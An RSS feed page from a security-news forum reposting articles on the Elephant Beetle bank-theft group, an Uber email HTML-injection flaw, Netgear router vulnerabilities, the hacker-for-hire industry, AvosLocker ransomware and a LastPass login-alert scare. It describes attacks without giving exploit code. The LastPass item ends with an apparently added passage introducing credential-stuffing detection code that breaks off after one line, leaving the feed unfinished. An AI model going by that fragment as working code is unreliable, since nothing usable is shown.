<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/139/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>Researchers Uncover Hacker Group Behind Organized Financial-Theft Operation</title><link>https://nsaneforums.com/news/security-privacy-news/researchers-uncover-hacker-group-behind-organized-financial-theft-operation-r3790/</link><description><![CDATA[<p>
	Cybersecurity researchers have taken the wraps off an organized financial-theft operation undertaken by a discreet actor to target transaction processing systems and siphon funds from entities primarily located in Latin America for at least four years.
</p>

<p>
	 
</p>

<p>
	The malicious hacking group has been codenamed Elephant Beetle by Israeli incident response firm Sygnia, with the intrusions aimed at banks and retail companies by injecting fraudulent transactions among benign activity to slip under the radar after an extensive study of the targets' financial structures.
</p>

<p>
	 
</p>

<p>
	"The attack is relentless in its ingenious simplicity serving as an ideal tactic to hide in plain sight, without any need to develop exploits," the researchers said in a report shared with The Hacker News, calling out the group's overlaps with another tracked by Mandiant as FIN13, an "industrious" threat actor linked to data theft and ransomware attacks in Mexico stretching back as early as 2016.
</p>

<p>
	 
</p>

<p>
	Elephant Beetle is said to leverage an arsenal of no fewer than 80 unique tools and scripts to execute its attacks, while simultaneously taking steps to blend in with the victim's environment over long periods to achieve its objectives.
</p>

<p>
	 
</p>

<p>
	"The unique modus operandi associated with the Elephant Beetle is their deep research and knowledge of victim's financial systems and operations and their persistent search for vulnerable methods to technically inject financial transactions, ultimately leading to major financial theft," Arie Zilberstein, vice president of incident response at Sygnia, told The Hacker News. "Given the long period of persistence this group has in victim's networks, they often change and adapt their techniques and tooling to continue to be relevant."
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="AVvXsEhzjacflGZXDRxIZwaG80jE5Bny9oizLJym" class="ipsImage" data-ratio="51.94" height="370" width="720" src="https://thehackernews.com/new-images/img/a/AVvXsEhzjacflGZXDRxIZwaG80jE5Bny9oizLJym4-eWmVj6glCSfaTYBhL3yzZoOLaMEFzZtYuyMJvr9nt-3mDZR89zp2Y2Pk1C642QkDduUJIu9B60eZ3jC8VNK-xEcgwFVS19XJqXeCTIFzHwWfdfOXKDrvvW7lzBFCBQR8CGBOZje6repqJn6Dpc2o9Z=s728-e1000" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	Zilberstein attributed the success of the campaign to the vast attack surface provided by legacy systems that are present in financial institutions' networks and can serve as entry points, thereby enabling attackers to gain a permanent foothold into target networks.
</p>

<p>
	 
</p>

<p>
	The adversary's modus operandi follows a low-profile pattern that begins with planting backdoors to study the victim's environment, specifically with the aim of understanding the various processes used to facilitate financial transactions, followed by inserting rogue transactions of its own into the network that steal incremental amounts of money from the target to avoid setting off alarms.
</p>

<p>
	 
</p>

<p>
	But in the event the actor's fraudulent actions come to light, they temporarily cease their operations only to return a few months later. The initial access is brokered by taking advantage of unpatched flaws in external-facing Java-based web servers such as WebSphere and WebLogic, ultimately leading to the deployment of web shells that enable remote code execution and lateral movement —
</p>

<p>
	 
</p>

<p>
	<span style="color:#2980b9;">CVE-2017-1000486</span> (CVSS score: 9.8) - Primefaces Application Expression Language Injection<br />
	<span style="color:#2980b9;">CVE-2015-7450</span> (CVSS score: 9.8) - WebSphere Application Server SOAP Deserialization Exploit<br />
	<span style="color:#2980b9;">CVE-2010-5326</span> (CVSS score: 10.0) - SAP NetWeaver Invoker Servlet Exploit<br />
	<span style="color:#2980b9;">EDB-ID-24963</span> - SAP NetWeaver ConfigServlet Remote Code Execution
</p>

<p>
	<br />
	"This attack emphasizes once again that sophisticated attackers are sometimes lurking in networks for [a] long time," Zilberstein said. "While a lot of emphasis is given today to avoiding and preventing the imminent risk of ransomware, some other threat actors are still operating to stealthily proliferate themselves in networks to get a long term and steady financial gain."
</p>

<p>
	 
</p>

<p>
	"Organizations need to pay extra attention to these systems, particularly those which are externally facing, and perform patching and continuous hunting to prevent and detect attacks of similar nature," Zilberstein added.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2022/01/researchers-uncover-hacker-group-behind.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3790</guid><pubDate>Wed, 05 Jan 2022 15:17:07 +0000</pubDate></item><item><title>Uber ignores vulnerability that lets you send any email from Uber.com</title><link>https://nsaneforums.com/news/security-privacy-news/uber-ignores-vulnerability-that-lets-you-send-any-email-from-ubercom-r3758/</link><description><![CDATA[<p>
	A vulnerability in Uber's email system allows just about anyone to send emails on behalf of Uber.
</p>

<p>
	 
</p>

<p>
	The researcher who discovered this flaw warns this vulnerability can be abused by threat actors to email 57 million Uber users and drivers whose information was leaked in the 2016 data breach.
</p>

<p>
	 
</p>

<p>
	Uber seems to be aware of the flaw but has not fixed it for now.
</p>

<h2>
	'Your Uber is arriving now'
</h2>

<p>
	Security researcher and bug bounty hunter <a href="https://twitter.com/0x21SAFE" rel="external nofollow" target="_blank">Seif Elsallamy</a> discovered a flaw in Uber's systems that enables anyone to send emails on behalf of Uber.
</p>

<p>
	 
</p>

<p>
	These emails, sent from Uber's servers, would appear legitimate to an email provider (because technically they are) and make it past any spam filters.
</p>

<p>
	 
</p>

<p>
	Imagine getting a message from Uber stating, 'Your Uber is arriving now,' or 'Your Thursday morning trip with Uber'—when you never made those trips.
</p>

<p>
	 
</p>

<p>
	In a demonstration, Elsallamy sent me the following email message that, without a doubt, appeared to have come from Uber and landed right in my inbox, not junk:
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="email-from-uber.jpg" class="ipsImage" data-ratio="75.10" height="540" width="553" src="https://www.bleepstatic.com/images/news/u/1164866/2022/January-2022/uber-email-vulnerability/email-from-uber.jpg">
		</p>

		<figcaption>
			PoC email sent to BleepingComputer from Uber's servers
		</figcaption>
	</figure>
</div>

<p>
	The email form sent to BleepingComputer by the researcher urges the Uber customer to provide their credit card information.
</p>

<p>
	 
</p>

<p>
	On clicking 'Confirm,' the form submits the text fields to a test site set up by the researcher.
</p>

<p>
	 
</p>

<p>
	Note, however, the message did have a clear disclaimer towards the bottom stating, "this is a security vulnerability Proof of Concept," and was sent to BleepingComputer with prior permission.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="email-from-uber2.jpg" class="ipsImage" data-ratio="75.10" height="540" width="519" src="https://www.bleepstatic.com/images/news/u/1164866/2022/January-2022/uber-email-vulnerability/email-from-uber2.jpg">
		</p>

		<figcaption>
			PoC disclaimer in the email sent to BleepingComputer from Uber
		</figcaption>
	</figure>
</div>

<p>
	On New Year's Eve of 2021, the researcher responsibly reported the vulnerability to Uber via their HackerOne bug bounty program.
</p>

<p>
	 
</p>

<p>
	However, his report was rejected for being "out-of-scope" on the erroneous assumption that exploitation of the technical flaw itself required some form of social engineering:
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="uber-response-min.jpeg" class="ipsImage" data-ratio="75.10" height="293" width="720" src="https://www.bleepstatic.com/images/news/u/1164866/2022/January-2022/uber-email-vulnerability/uber-response-min.jpeg">
		</p>

		<figcaption>
			Uber rejects researcher's report concluding that it requires social engineering (<a href="http://twitter.com/0x21SAFE/status/1476991015395471364" rel="external nofollow" target="_blank">Twitter</a>) 
		</figcaption>
	</figure>
</div>

<p>
	It seems this isn't the first time that Uber has dismissed this particular flaw either.
</p>

<p>
	 
</p>

<p>
	Bug bounty hunters Soufiane el Habti and Shiva Maharaj claim they had previously reported the issue to Uber without success [<a href="https://twitter.com/wld_basha/status/1477661440131710978" rel="external nofollow" target="_blank">1</a>, <a href="https://twitter.com/wld_basha/status/1477663015902363659" rel="external nofollow" target="_blank">2</a>, <a href="https://twitter.com/ShivaSMaharaj/status/1477670787792445444" rel="external nofollow" target="_blank">3</a>].
</p>

<h2>
	57 million Uber customers and drivers at risk
</h2>

<p>
	Contrary to what one may believe, this isn't a simple case of <a href="https://en.wikipedia.org/wiki/Email_spoofing" rel="external nofollow" target="_blank">email spoofing</a> used by threat actors to craft phishing emails.
</p>

<p>
	 
</p>

<p>
	In fact, the email sent by the researcher "from Uber" to BleepingComputer passed both <a href="https://en.wikipedia.org/wiki/DomainKeys_Identified_Mail" rel="external nofollow" target="_blank">DKIM</a> and <a href="https://en.wikipedia.org/wiki/DMARC" rel="external nofollow" target="_blank">DMARC</a> security checks, according to email headers seen by us.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="dkim-spf-pass.jpg" class="ipsImage" data-ratio="75.10" height="391" width="720" src="https://www.bleepstatic.com/images/news/u/1164866/2022/January-2022/uber-email-vulnerability/dkim-spf-pass.jpg">
		</p>

		<figcaption>
			Email sent "from Uber" passes DKIM and DMARC security checks (BleepingComputer)
		</figcaption>
	</figure>
</div>

<p>
	The researcher's email was sent via <a href="https://en.wikipedia.org/wiki/SendGrid" rel="external nofollow" target="_blank">SendGrid</a>, an email marketing and customer communications platform used by leading companies.
</p>

<p>
	 
</p>

<p>
	But Elsallamy tells BleepingComputer that it is an exposed endpoint on Uber's servers that is responsible for the flaw and allows anyone to craft an email on behalf of Uber.
</p>

<p>
	 
</p>

<p>
	The vulnerability is "an HTML injection in one of Uber's email endpoints," says Elsallamy, drawing comparison to a <a href="https://ysamm.com/?p=308" rel="external nofollow" target="_blank">similar flaw discovered in 2019</a> on Meta's (Facebook's) servers by pen-tester Youssef Sammouda.
</p>

<p>
	 
</p>

<p>
	In Meta's case, the endpoint looked identical to:
</p>

<pre>https://legal.tapprd.thefacebook.com/tapprd/Portal/ShowWorkFlow/AnonymousEmbed/XXXXXXXXXXXXX </pre>

<p>
	Understandably, for security reasons, the researcher did not disclose the vulnerable Uber endpoint.
</p>

<p>
	 
</p>

<p>
	He <a href="http://twitter.com/0x21SAFE/status/1477003988792926210" rel="external nofollow" target="_blank">questioned</a> Uber, "Bring your [calculator] and tell me what would be the result if this vulnerability has been used with the 57 million email [addresses that leaked] from the last data breach?"
</p>

<p>
	 
</p>

<p>
	"If you know the result then tell your employees in the bug bounty triage team."
</p>

<p>
	 
</p>

<p>
	Elsallamy is referring to Uber's 2016 data breach that exposed the personal information of <a href="https://www.bleepingcomputer.com/news/security/uber-fined-for-covering-up-2016-data-breach/" target="_blank" rel="external nofollow">57 million Uber customers and drivers</a>.
</p>

<p>
	 
</p>

<p>
	For this mishap, the UK's Information Commissioner's Office (ICO) had fined Uber £385,000, along with the data protection authority in the Netherlands (Autoriteit Persoonsgegevens) fining the company €600.000.
</p>

<p>
	 
</p>

<p>
	By exploiting this unpatched vulnerability, adversaries can potentially send targeted phishing scams to millions of Uber users previously affected by the breach.
</p>

<p>
	 
</p>

<p>
	When asked what Uber could do to remediate the flaw, the researcher advises:
</p>

<p>
	 
</p>

<p>
	"They need to sanitize the users' input in the vulnerable undisclosed form. Since the HTML is being rendered, they might use a security encoding library to do HTML entity encoding so any HTML appears as text," Elsallamy told BleepingComputer.
</p>

<p>
	 
</p>

<p>
	BleepingComputer reached out to Uber well in advance of publishing but has not heard back at this time.
</p>

<p>
	 
</p>

<p>
	Uber users, staff, drivers, and associates should watch out for any phishing emails sent from Uber that appear to be legitimate as exploitation of this flaw by threat actors remains a possibility.
</p>

<p>
	 
</p>

<p>
	Update 11:55 AM: Added reference to the same flaw having been reported in 2015/16 and March 2021 but dismissed.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/uber-ignores-vulnerability-that-lets-you-send-any-email-from-ubercom/" rel="external nofollow">Uber ignores vulnerability that lets you send any email from Uber.com</a>
</p>
]]></description><guid isPermaLink="false">3758</guid><pubDate>Sun, 02 Jan 2022 21:56:30 +0000</pubDate></item><item><title>Netgear leaves vulnerabilities unpatched in Nighthawk router</title><link>https://nsaneforums.com/news/security-privacy-news/netgear-leaves-vulnerabilities-unpatched-in-nighthawk-router-r3745/</link><description><![CDATA[<p>
	Researchers have found half a dozen high-risk vulnerabilities in the latest firmware version for the Netgear Nighthawk R6700v3 router. At publishing time the flaws remain unpatched.
</p>

<p>
	 
</p>

<p>
	Nighthawk R6700 is a popular dual-band WiFi router advertised with gaming-focused features, smart parental controls, and internal hardware that is sufficiently powerful to accommodate the needs of home power users.
</p>

<p>
	 
</p>

<p>
	The six flaws were discovered by researchers at cybersecurity company Tenable and could allow an attacker on the network to take complete control of the device:
</p>

<p>
	 
</p>

<ul>
	<li>
		<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-20173" rel="external nofollow" target="_blank">CVE-2021-20173</a>: A post-authentication command injection flaw in the device's update functionality.
	</li>
	<li>
		<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-20174" rel="external nofollow" target="_blank">CVE-2021-20174</a>: HTTP is used by default on all communications of the device’s web interface, risking username and password interception in cleartext form.
	</li>
	<li>
		<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-20175" rel="external nofollow" target="_blank">CVE-2021-20175</a>: SOAP Interface (port 5000) uses HTTP to communicate by default, risking username and password interception in cleartext form.
	</li>
	<li>
		<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-23147" rel="external nofollow" target="_blank">CVE-2021-23147</a>: Command execution as root without authentication via a UART port connection. Exploiting this flaw requires physical access to the device.
	</li>
	<li>
		<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45732" rel="external nofollow" target="_blank">CVE-2021-45732</a>: Configuration manipulation via hardcoded encryption routines, allowing the changing of settings that are locked for reasons of security.
	</li>
	<li>
		<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45077" rel="external nofollow" target="_blank">CVE-2021-45077</a>: All usernames and passwords for the device’s services are stored in plaintext form in the configuration file.
	</li>
</ul>

<p>
	 
</p>

<p>
	On top of the aforementioned security issues, <a href="https://www.tenable.com/security/research/tra-2021-57" rel="external nofollow" target="_blank">Tenable found</a> several instances of jQuery libraries relying on version 1.4.2, which is known to contain vulnerabilities. The researchers also note that the device uses a MiniDLNA server version with publicly known flaws.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="post-request.jpg" class="ipsImage" data-ratio="27.50" height="191" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/post-request.jpg">
		</p>

		<figcaption>
			POST request forcing an update check to exploit CVE-2021-20173<br>
			Source: Tenable
		</figcaption>
	</figure>
</div>

<p>
	The recently disclosed flaws affect firmware version 1.0.4.120, which is the latest release for the device.
</p>

<p>
	 
</p>

<p>
	Users are advised to change the default credentials to something unique and strong and follow recommended security practices for more robust defense against malware infections.
</p>

<p>
	 
</p>

<p>
	Also, check Netgear’s <a href="https://kb.netgear.com/000064030/R6700v3-Firmware-Version-1-0-4-120" rel="external nofollow" target="_blank">firmware download portal</a> regularly and install new versions as soon as they become available. Turning on automatic updates on your router is also recommended.
</p>

<p>
	 
</p>

<p>
	The current security report refers to Netgear R6700 v3, which is still under support, not Netgear R6700 v1 and R6700 v2, which have reached end of life. If you are still using the older models, it is recommended to replace them.
</p>

<p>
	 
</p>

<p>
	Tenable disclosed the above issues to the vendor on September 30, 2021, and even though some information exchange in the form of clarifications and suggestions took place afterward, the problems remain unaddressed.
</p>

<p>
	 
</p>

<p>
	We have reached out to Netgear asking for a comment on the above, and we will add an update to this story as soon as we hear back from them.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/netgear-leaves-vulnerabilities-unpatched-in-nighthawk-router/" rel="external nofollow">Netgear leaves vulnerabilities unpatched in Nighthawk router</a>
</p>
]]></description><guid isPermaLink="false">3745</guid><pubDate>Fri, 31 Dec 2021 22:01:05 +0000</pubDate></item><item><title>The hacker-for-hire industry is now too big to fail</title><link>https://nsaneforums.com/news/security-privacy-news/the-hacker-for-hire-industry-is-now-too-big-to-fail-r3742/</link><description><![CDATA[<p>
	<span style="font-size:18px;">This is a big moment of turbulence and change for the hacking business. But the demand is here to stay. </span>
</p>

<p>
	 
</p>

<p>
	A shock has reverberated inside Israel in the last few months. NSO Group, the billion-dollar Israeli company that has sold hacking tools to governments around the world for more than a decade, has drawn intense scrutiny after a series of public scandals. The company is in crisis. Its future is in doubt.
</p>

<p>
	<br />
	But while NSO Group’s future is uncertain, governments are more likely than ever to buy cyber capabilities from the industry NSO helped define. Business is booming for “hackers for hire” firms. In the last decade, the industry has grown from a novelty into a key instrument of power for nations around the world. Even the potential failure of a major firm like NSO Group isn’t likely to slow the growth.
</p>

<p>
	<br />
	Just this month, Facebook reported that seven hacker-for-hire firms from around the world had targeted around 50,000 people on the company’s platforms. The report spotlighted four more Israeli companies alongside operations from China, India, and North Macedonia. The fact that the investigation didn’t even mention NSO Group shows that the industry and its targeting are far more vast than what the public can typically see.
</p>

<p>
	<br />
	NSO Group has been besieged by criticism and charges of abuse for years. In 2016, the United Arab Emirates was caught targeting human rights activist Ahmed Mansoor using NSO Group’s Pegasus, a tool that leverages software flaws to hack iPhones and turn control over to NSO Group’s customers. In that case, the UAE government was seen as the culprit, and NSO walked away unscathed (Mansoor is still in prison on charges of criticizing the country’s regime).
</p>

<p>
	<br />
	The pattern repeated for years–over and over again, governments would be accused of using NSO hacking tools against dissidents but the company denied wrongdoing and escaped punishment. Then, in mid-2021, new reports emerged of alleged abuse against Western governments. The company was sanctioned by the US in November, and in December Reuters reported that US State Department officials had been hacked using Pegasus.
</p>

<p>
	<br />
	Now NSO Group faces expensive public lawsuits from Facebook and Apple. It has to deal with debt, low morale, and fundamental threats to its future. Suddenly, the poster child for spyware is confronting an existential crisis.
</p>

<p>
	<br />
	All of this is familiar territory. The secretive hacker-for-hire industry first splashed across international newspaper headlines in 2014, when the Italian firm Hacking Team was charged with selling its “untraceable” spyware to dozens of countries without regard for human rights or privacy violations.
</p>

<p>
	<br />
	Hacking Team opened the world’s eyes to a global industry that bought and sold powerful tools to break into computers anywhere. The resulting storm of scandals seemed to eventually kill it. The company lost business and the ability to legally sell its tools internationally.
</p>

<p>
	 
</p>

<p>
	Hacking Team was sold and, in the public’s mind, left for dead. Eventually, however, it rebranded and started selling the same products. Only this time, it was a smaller fish in a much bigger pond.
</p>

<p>
	<br />
	“The demise of Hacking Team did not lead to fundamental change in the industry at all,” says James Shires, assistant professor at the Institute of Security and Global Affairs at Leiden University. “The same dynamic and demand still exists.”
</p>

<p>
	<br />
	The industry’s earliest customers were a small set of countries eager to project power around the world through the internet. The situation is far more complex today. Many more countries now pay for the instant capability to hack adversaries both internationally and within their own borders. Billions of dollars are at play, but there’s very little transparency and even less accountability.
</p>

<p>
	<br />
	While public scrutiny of firms that provide hackers for hire has grown, the global demand for offensive cyber capabilities has escalated too. In the 21st century, a government’s highest-value targets are online more than ever—and hacking is usually the most effective way to get to them.
</p>

<p>
	<br />
	The result is a growing crowd of countries willing to spend large sums to develop sophisticated hacking operations.
</p>

<p>
	<br />
	For governments, investing in cyber is a relatively cheap and potent way to compete with rival nations—and develop powerful tools of domestic control.
</p>

<p>
	<br />
	“Especially in the last five years, you have more countries developing cyber capabilities,” says Saher Naumaan, a principal threat intelligence analyst at BAE Systems.
</p>

<p>
	<br />
	And more of those countries are looking outside for help. “If you don’t have a way to harness the skills or talent of the people in your country but you have the resources to outsource, why wouldn’t you go commercial?” she says. “That’s an option in a lot of different industries. In that way, cyber is not that different. You’re paying for something you’re not going to build yourself.”
</p>

<p>
	<br />
	For example, oil-rich countries on the Persian Gulf have historically lacked the considerable technical capability needed to develop domestic hacking power. So they spend on a shortcut. “They don’t want to be left behind,” Naumaan says.
</p>

<p>
	<br />
	Military contracting giants across the world now develop and sell these capabilities. These tools have been used to commit egregious abuses of power. They’re also increasingly used in legitimate criminal investigations and counterterrorism and are key to espionage and military operations.
</p>

<p>
	<br />
	The demand for what private hacking companies are selling isn’t going away. “The industry is both bigger and more visible today than it was a decade ago,” says Winnona DeSombre, a security researcher and fellow at the Atlantic Council. “The demand is rising because the world is becoming more technologically connected.”
</p>

<p>
	<br />
	DeSombre recently mapped the famously opaque industry by charting hundreds of companies selling digital surveillance tools around the world. She argues that much of the industry’s growth is hidden from public view, including Western companies’ sales of cyber weapons and surveillance technology to geopolitical adversaries.
</p>

<p>
	<br />
	“The biggest issue comes when this space is primarily self-regulated,” she explained. Self-regulation “can result in widespread human rights abuses” or even friendly fire, when hacking tools are sold to foreign governments that turn around and use the same capabilities against the country of origin.
</p>

<p>
	<br />
	Alerted to the industry’s increasing impact, authorities around the world now aim to shape its future with sanctions, indictments, and new regulations on exports. Even so, the demand for the tools grows.
</p>

<p>
	<br />
	Ultimately, the most meaningful change may come when there’s an impact on companies’ revenue. Recent reports show that NSO Group is saddled with debt and struggling to court Wall Street investment.
</p>

<p>
	<br />
	“This is a commercial industry, after all,” Shires says. “If venture capital firms and big corporate investors see this as a risky bet, they’ll choose to pull out. More than anything else, that can change the industry radically.”
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.technologyreview.com/2021/12/28/1043029/the-hacker-for-hire-industry-is-now-too-big-to-fail/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3742</guid><pubDate>Fri, 31 Dec 2021 12:20:55 +0000</pubDate></item><item><title>Ransomware gang coughs up decryptor after realizing they hit the police</title><link>https://nsaneforums.com/news/security-privacy-news/ransomware-gang-coughs-up-decryptor-after-realizing-they-hit-the-police-r3736/</link><description><![CDATA[<p>
	The AvosLocker ransomware operation provided a free decryptor after learning they encrypted a US government agency.
</p>

<p>
	 
</p>

<p>
	Last month, a US police department was breached by AvosLocker, who encrypted devices and stole data during the attack.
</p>

<p>
	 
</p>

<p>
	However, according to a screenshot shared by security researcher <a href="https://twitter.com/pancak3lullz" rel="external nofollow" target="_blank">pancak3</a>, after learning that the victim was a government agency, they provided a decryptor for free.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="avoslocker-chat.jpg" class="ipsImage" data-ratio="75.10" height="426" width="720" src="https://www.bleepstatic.com/images/news/ransomware/a/avoslocker/us-police-department-free-key/avoslocker-chat.jpg">
		</p>

		<figcaption>
			AvosLocker chat screen offering free decryptor<br>
			Source: <a href="https://twitter.com/pancak3lullz/status/1476217440442925057" rel="external nofollow" target="_blank">Twitter</a>
		</figcaption>
	</figure>
</div>

<p>
	While they provided a decryptor to the police department, the ransomware operation refused to provide a list of stolen files or how they breached the department's network.
</p>

<p>
	 
</p>

<p>
	A member of the AvosLocker operation told BleepingComputer today that they have no policy on who they target but usually avoid encrypting government entities and hospitals.
</p>

<p>
	 
</p>

<p>
	"You should note, however, that sometimes an affiliate will lock a network without having us review it first," the AvosLocker operator told BleepingComputer.
</p>

<p>
	 
</p>

<p>
	When asked if they purposely avoid targeting government agencies out of fear of law enforcement, they said it's more because "tax payer money's generally hard to get."
</p>

<p>
	 
</p>

<p>
	However, international law enforcement operations have resulted in numerous indictments or <a href="https://www.bleepingcomputer.com/news/security/ransomware-operators-behind-hundreds-of-attacks-arrested-in-ukraine/" target="_blank" rel="external nofollow">arrests of ransomware members</a> and <a href="https://www.wsj.com/articles/u-s-accuses-russian-of-money-laundering-for-ryuk-ransomware-gang-11636741333" rel="external nofollow" target="_blank">money launderers</a> over the past year. These arrests include members of the <a href="https://www.bleepingcomputer.com/news/security/revil-ransomware-affiliates-arrested-in-romania-and-kuwait/" target="_blank" rel="external nofollow">REvil</a>, <a href="https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/" target="_blank" rel="external nofollow">Egregor</a>, <a href="https://www.bleepingcomputer.com/news/security/us-charges-netwalker-ransomware-affiliate-seizes-ransom-payments/" target="_blank" rel="external nofollow">Netwalker</a>, and <a href="https://www.bleepingcomputer.com/news/security/ukraine-arrests-clop-ransomware-gang-members-seizes-servers/" target="_blank" rel="external nofollow">Clop</a> ransomware gangs.
</p>

<p>
	 
</p>

<p>
	This increased pressure has had a noticeable effect, leading to numerous ransomware operations shutting down, including the <a href="https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-operation-shuts-down/" target="_blank" rel="external nofollow">DarkSide</a>, <a href="https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-claims-to-be-shutting-down-due-to-police-pressure/" target="_blank" rel="external nofollow">BlackMatter</a>, <a href="https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/" target="_blank" rel="external nofollow">Avaddon</a>, and <a href="https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/" target="_blank" rel="external nofollow">REvil</a> operations.
</p>

<p>
	 
</p>

<p>
	Unfortunately, many of these ransomware gangs just <a href="https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/" target="_blank" rel="external nofollow">rebrand as a new operation</a>, thinking it will help them evade law enforcement.
</p>

<p>
	 
</p>

<p>
	Even with these arrests and increased pressure, AvosLocker said they are not worried about law enforcement as they "have no jurisdiction" in the "motherland."
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/ransomware-gang-coughs-up-decryptor-after-realizing-they-hit-the-police/" rel="external nofollow">Ransomware gang coughs up decryptor after realizing they hit the police</a>
</p>
]]></description><guid isPermaLink="false">3736</guid><pubDate>Thu, 30 Dec 2021 21:21:05 +0000</pubDate></item><item><title>LastPass says no passwords were compromised following breach scare</title><link>https://nsaneforums.com/news/security-privacy-news/lastpass-says-no-passwords-were-compromised-following-breach-scare-r3728/</link><description><![CDATA[<div>
	<div>
		<p>
			<strong>Now LastPass says some alerts of unauthorized logins that users received were sent in error</strong>
		</p>
	</div>
</div>

<div>
	<div>
		<div>
			<p>
				 
			</p>

			<p id="wP2WR0">
				LastPass says there’s no evidence of a data breach following users’ reports that they were notified of unauthorized login attempts, as reported by <a href="https://appleinsider.com/articles/21/12/28/lastpass-master-passwords-may-have-been-compromised" rel="external nofollow">AppleInsider</a>. The password manager maintains that it was never compromised, and users’ accounts haven’t been accessed by bad actors.
			</p>

			<p>
				 
			</p>

			<p id="DOm8Gi">
				Nikolett Bacso-Albaum, the senior director of LogMeIn Global PR initially told The Verge that the alerts users received were related “to fairly common bot-related activity,” involving malicious attempts to log in to LastPass accounts using email addresses and passwords that bad actors sourced from past breaches of third-party services (i.e. not LastPass).
			</p>

			<p>
				 
			</p>

			<p id="UwdDiB">
				“It’s important to note that we do not have any indication that accounts were successfully accessed or that the LastPass service was otherwise compromised by an unauthorized party,” Bacso-Albaum said. “We regularly monitor for this type of activity and will continue to take steps designed to ensure that LastPass, its users, and their data remain protected and secure.”
			</p>

			<p>
				 
			</p>

			<p id="m0vJju">
				However, late Tuesday night LastPass vice president of product management Dan DeMichele released a statement to The Verge with a more detailed explanation, which says at least some of the alerts were “likely triggered in error,” due to an issue that LastPass has now resolved.
			</p>

			<p>
				 
			</p>

			<p id="OfqXBh" style="margin-left: 40px;">
				As previously stated, LastPass is aware of and has been investigating recent reports of users receiving e-mails alerting them to blocked login attempts.
			</p>

			<p style="margin-left: 40px;">
				 
			</p>

			<p style="margin-left: 40px;">
				We quickly worked to investigate this activity and at this time we have no indication that any LastPass accounts were compromised by an unauthorized third-party as a result of this credential stuffing, nor have we found any indication that users’ LastPass credentials were harvested by malware, rogue browser extensions or phishing campaigns.
			</p>

			<p style="margin-left: 40px;">
				 
			</p>

			<p style="margin-left: 40px;">
				However, out of an abundance of caution, we continued to investigate in an effort to determine what was causing the automated security alert e-mails to be triggered from our systems.
			</p>

			<p style="margin-left: 40px;">
				 
			</p>

			<p style="margin-left: 40px;">
				Our investigation has since found that some of these security alerts, which were sent to a limited subset of LastPass users, were likely triggered in error. As a result, we have adjusted our security alert systems and this issue has since been resolved.
			</p>

			<p style="margin-left: 40px;">
				 
			</p>

			<p style="margin-left: 40px;">
				These alerts were triggered due to LastPass’s ongoing efforts to defend its customers from bad actors and credential stuffing attempts. It is also important to reiterate that LastPass’ zero-knowledge security model means that at no time does LastPass store, have knowledge of, or have access to a user’s Master Password(s).
			</p>

			<p style="margin-left: 40px;">
				 
			</p>

			<p style="margin-left: 40px;">
				We will continue to regularly monitor for unusual or malicious activity and will, as necessary, continue to take steps designed to ensure that LastPass, its users and their data remain protected and secure.
			</p>

			<p>
				<a href="https://twitter.com/technology_greg/status/1475600580521381889" rel="external nofollow">Tweet from @technology_greg describing the LastPass alerts</a>
			</p>

			<p>
				 
			</p>

			<p id="fWXLR8">
				Reports started cropping up on the <a href="https://news.ycombinator.com/item?id=29705957" rel="external nofollow">Hacker News forum</a> after a LastPass user created a post to highlight the issue. He claims that LastPass warned him of a login attempt from Brazil using his master password. Other users quickly responded to the post, noting that they experienced something similar. As the original poster (@technology_greg) points out in a tweet, some were also alerted of an attempt from Brazil, while other attempts were traced back to different countries. This, understandably, raised concerns that a breach took place.
			</p>

			<p>
				 
			</p>

			<p id="8FL8wk">
				Even if LastPass wasn’t actually compromised, it’s still a good idea to fortify your account with <a href="https://www.lastpass.com/products/multifactor-authentication" rel="external nofollow" target="_blank">multifactor authentication</a>, which requires a second proof of identity (such as a code from an authenticator app or a hardware security key) in addition to the master password, so a password leaked from another service is not enough on its own to log in.
			</p>
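			<p>
				The pattern LastPass describes, bulk login attempts replaying email/password pairs from other sites' breaches, has a distinctive shape in authentication logs, and the follow-up statement shows the cost of alerting users on the wrong signal. The following Python is an added example, not LastPass code: it runs over a handful of constructed login events, flags source IPs whose behaviour looks like credential stuffing (many distinct accounts, almost no successes), and notifies an account owner only about a successful login from a country that account has not used before, leaving blocked bot traffic to the defender's queue. The event fields, the thresholds and the "known countries" table are assumptions made for the example.
			</p>

```python
from collections import defaultdict

# Constructed sample authentication events (not real LastPass telemetry).
# Fields: timestamp, account, source IP, GeoIP country, outcome.
EVENTS = [
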